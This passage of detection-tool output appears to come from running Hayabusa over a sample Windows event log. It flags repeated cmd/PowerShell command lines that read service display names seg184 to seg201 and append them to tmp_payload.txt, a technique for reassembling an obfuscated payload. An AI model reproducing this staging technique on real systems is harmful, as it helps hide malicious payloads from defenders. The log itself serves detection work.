payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:53.645 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:55.099 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg184"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x7c0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:55.114 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg184"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfd4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:55.114 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:56.538 +00:00,FS03.offsec.lan,4688,low,,Suspicious 
Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg185"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x990 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:56.554 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg185"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe4c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:56.554 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:58.007 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg186"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x4a8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:58.007 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg186"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xbc4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:58.007 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:59.462 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg187"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x750 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:59.462 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg187"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x324 | User: FS03$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:59.462 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:00.900 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg188"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xcec | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:00.900 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg188"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x470 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:00.900 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive 
PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:02.337 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg189"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x490 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:02.337 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg189"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb1c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:02.337 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:03.788 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg190"" | select 
-Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xaf0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:03.788 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg190"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfe4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:03.788 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:05.256 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg191"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x474 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:05.256 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg191"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xabc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:05.256 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:06.713 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg192"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xb14 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:06.728 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg192"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x61c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated 
payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:06.728 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:08.194 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg193"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd30 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:08.194 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg193"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x1dc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:08.194 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:09.644 +00:00,FS03.offsec.lan,4688,low,,Suspicious 
Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg194"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdf0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:09.644 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg194"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xbc8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:09.644 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:11.108 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg195"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xed4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:11.124 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg195"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x964 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:11.124 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:12.598 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg196"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x580 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:12.598 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg196"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x254 | User: FS03$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:12.598 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:14.049 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg197"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd80 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:14.065 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg197"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd28 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:14.065 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive 
PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:15.496 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg198"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xfd0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:15.511 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg198"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd9c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:15.511 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:16.954 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg199"" | select 
-Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd38 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:16.954 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg199"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x92c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:16.954 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:18.401 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg200"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xde0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:18.401 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg200"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x6fc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:18.401 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:19.854 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg201"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x940 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:19.869 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg201"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x8f4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated 
